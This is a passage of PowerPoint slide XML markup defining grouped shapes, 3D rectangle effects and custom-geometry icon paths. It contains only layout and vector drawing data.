                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
